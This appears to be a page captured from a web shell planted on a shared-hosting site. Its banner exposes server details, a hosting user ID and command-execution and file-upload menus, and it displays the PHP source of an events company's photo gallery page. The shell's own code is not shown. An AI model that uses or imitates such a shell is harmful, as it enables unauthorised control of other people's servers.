|
Server IP : 2a02:4780:11:1596:0:cbc:26e7:10 / Your IP : 216.73.216.78 Web Server : LiteSpeed System : Linux in-mum-web1496.main-hosting.eu 5.14.0-611.38.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Mar 10 17:21:28 EDT 2026 x86_64 User : u213657319 ( 213657319) PHP Version : 8.3.30 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : OFF | Python : OFF Directory (0755) : /home/u213657319/domains/../public_html/ |
| [ Home ] | [ C0mmand ] | [ Upload File ] |
|---|
<style>
.machine{
padding:10px;
}
.machin_img{
height:300px;
width:100%;
border-style:solid;
}
.machine_name{
background-color: rgb(240 240 247);
height: 100px;
text-align: center;
margin-bottom: 10px;
}
.zoom_image{
margin-top:100px !important;
height:600px;
width:600px;
}
</style>
<?php include("include/header.php"); ?>
<section class="breadcrumbs">
<div class="container">
<div class="d-flex justify-content-between align-items-center">
<h2>Our Gallery</h2>
<ol>
<li><a href="index.php">Home</a></li>
<li>Our Gallery</li>
</ol>
</div>
</div>
</section><!-- End Our Portfolio Section -->
<?php include"gallery_slide.php"; ?>
<section class="portfolio">
<div class="container">
<div class="row machine">
<div class="machin_card col-md-4">
<div class="machin_img"><a href="gallery2.php?id=1 ">
<img src="admin/gallery_image/dental1.jpeg" class="img-fluid" style="height:100%; width:100%;" ></a>
</div>
<div class="machine_name">
<h4><a href="gallery2.php?id=1 ">Dental Expo Patna</a></h4>
</div>
</div>
<div class="machin_card col-md-4">
<div class="machin_img"><a href="gallery2.php?id=3 ">
<img src="admin/gallery_image/rawan3.jpeg" class="img-fluid" style="height:100%; width:100%;" ></a>
</div>
<div class="machine_name">
<h4><a href="gallery2.php?id=3 ">Introduced First E-Rawan Dahan concept Pacific Mall Dwarka</a></h4>
</div>
</div>
<div class="machin_card col-md-4">
<div class="machin_img"><a href="gallery2.php?id=4 ">
<img src="admin/gallery_image/hunar1.jpeg" class="img-fluid" style="height:100%; width:100%;" ></a>
</div>
<div class="machine_name">
<h4><a href="gallery2.php?id=4 ">International Hunar Haat<br> With Padma Shri Dulari Devi </a></h4>
</div>
</div>
<div class="machin_card col-md-4">
<div class="machin_img"><a href="gallery2.php?id=5 ">
<img src="admin/gallery_image/bm3.jpeg" class="img-fluid" style="height:100%; width:100%;" ></a>
</div>
<div class="machine_name">
<h4><a href="gallery2.php?id=5 ">Business Meeting</a></h4>
</div>
</div>
<div class="machin_card col-md-4">
<div class="machin_img"><a href="gallery2.php?id=6 ">
<img src="admin/gallery_image/ts233.jpeg" class="img-fluid" style="height:100%; width:100%;" ></a>
</div>
<div class="machine_name">
<h4><a href="gallery2.php?id=6 ">Training and Seminars</a></h4>
</div>
</div>
<div class="machin_card col-md-4">
<div class="machin_img"><a href="gallery2.php?id=7 ">
<img src="admin/gallery_image/wgs1.jpeg" class="img-fluid" style="height:100%; width:100%;" ></a>
</div>
<div class="machine_name">
<h4><a href="gallery2.php?id=7 ">Walmart Global Seller Submit</a></h4>
</div>
</div>
</div>
</div>
</section><!-- End Portfolio Section -->
<div id="modal01" class=" zoom_image w3-modal" onclick="this.style.display='none'">
<div class="w3-modal-content w3-animate-zoom">
<span class=" w3-button w3-hover-red w3-xlarge w3-display-topright">×</span>
<img id="img01" style="width:100%">
</div>
</div>
<?php include("include/footer.php"); ?>